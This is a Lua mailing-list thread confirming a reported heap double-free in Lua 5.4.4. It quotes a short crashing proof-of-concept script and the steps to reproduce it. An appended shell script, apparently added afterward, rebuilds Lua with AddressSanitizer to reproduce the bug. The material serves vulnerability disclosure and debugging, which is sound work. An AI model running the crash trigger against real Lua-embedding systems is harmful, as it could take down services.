lua-l archive



Can reproduce with Ubuntu 18.04 and a bleeding-edge Arch setup.

On Fri, May 13, 2022 at 1:09 PM Jinwei Dong <jwdong2000@qq.com> wrote:
>
> Hello,
>
> I found a heap buffer overflow which can cause a heap double free error.
>
> Lua version: Lua 5.4.4  Copyright (C) 1994-2022 Lua.org, PUC-Rio
> Latest commit: 8426d9b4d4df1da3c5b2d759e509ae1c50a86667
>
> Platform: Ubuntu-20.04 x86_64
> Glibc version: GLIBC 2.31-0ubuntu9.9
>
> POC:
> ---------------
> #poc.lua
> print(
>     xpcall((0),
>         function(...)
>             local f
>             if d[print(print(print(print(t[...]))))] then
>             end
>         end
>     )
> )
> ---------------
>
> How to reproduce:
> ---------------
> 1. git clone https://github.com/lua/lua
> 2. cd lua && make
> 3. ./lua ./poc.lua
> ---------------
>
> Error message:
> ---------------
> double free or corruption (!prev)
> [1]    49704 abort (core dumped)  ./lua ./poc.lua
> ---------------
>
> Address Sanitizer log: see **attachment.txt**
>
> I apologise for putting the ASan logs directly into the body of the e-mail in the previous mail, which made the body too large to view; I have now put them into an attachment file.
>
> And the stack backtrace is recursive, so this could be an error that occurs during some recursive processes.
>
> Found by: Jinwei Dong
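The following script is an added example for anyone wanting to reproduce the report under AddressSanitizer rather than only against glibc's malloc checks; it is not code from the report or from the Lua project. It performs the reporter's three steps with an instrumented build, keeps the ASan output in a log file, and turns the interpreter's exit status into a one-word verdict (the shell convention 128+N for death by signal N, so glibc's "double free or corruption" abort shows up as 134/SIGABRT, matching the "abort (core dumped)" line above). Assumptions: the environment variable LUA_SRC points at a checkout of https://github.com/lua/lua, that checkout's makefile uses the CC make variable for both compiling and linking so `make CC=...` is enough to instrument it, and a gcc or clang with libasan is installed. One observation that needs no extra tooling: in the PoC, `t` and `d` are never defined, so `t[...]` inside the xpcall message handler raises a fresh error, and Lua invokes the same handler again for that error, which would account for the recursive backtrace the reporter mentions.

```shell
#!/bin/sh
# Added example (not from the report or the Lua project): build a lua/lua
# checkout with AddressSanitizer, run the PoC, keep the log and exit status.
# Assumptions: LUA_SRC is a clone of https://github.com/lua/lua whose
# makefile honours an overridden CC for compile and link; libasan is present.
set -eu

# Write the reporter's PoC verbatim to the path given as $1.
write_poc() {
    cat > "$1" <<'EOF'
print(
    xpcall((0),
        function(...)
            local f
            if d[print(print(print(print(t[...]))))] then
            end
        end
    )
)
EOF
}

# Build an ASan-instrumented interpreter in the checkout at $1.
# CC is overridden (assumption: the makefile links with $(CC) too), so the
# sanitizer runtime is linked in as well; -g keeps file:line in the report.
build_lua_asan() {
    ( cd "$1" && { make clean >/dev/null 2>&1 || true; }
      make CC="${CC:-gcc} -fsanitize=address -fno-omit-frame-pointer -g" )
}

# Map a process exit status to a verdict. ASan exits 1 by default and
# aborts (134) when abort_on_error=1; 128+N is death by signal N.
classify_status() {
    case "$1" in
        0)   echo "clean exit" ;;
        1)   echo "ASan report" ;;
        134) echo "SIGABRT" ;;
        139) echo "SIGSEGV" ;;
        *)   echo "exit $1" ;;
    esac
}

# Run the PoC ($2) under the interpreter ($1), logging to $3, and print
# the verdict. Leak detection is off so only the memory error is reported.
run_poc() {
    lua_bin=$1; poc=$2; log=$3
    status=0
    ASAN_OPTIONS=abort_on_error=1:detect_leaks=0 \
        "$lua_bin" "$poc" >"$log" 2>&1 || status=$?
    classify_status "$status"
}

# Usage: LUA_SRC=/path/to/lua sh repro_asan.sh
if [ -n "${LUA_SRC:-}" ]; then
    write_poc poc.lua
    build_lua_asan "$LUA_SRC"
    run_poc "$LUA_SRC/lua" poc.lua asan.log
    # First line of the sanitizer report (or glibc's message) for a quick look.
    grep -E 'ERROR: AddressSanitizer|double free' asan.log | head -n 1
fi
```

Run it from a scratch directory so that poc.lua and asan.log land next to each other; the full ASan report, including the recursive backtrace, is in asan.log. If the verdict is "clean exit", the instrumented build did not trip the bug and the toolchain or the checkout differs from the reporter's.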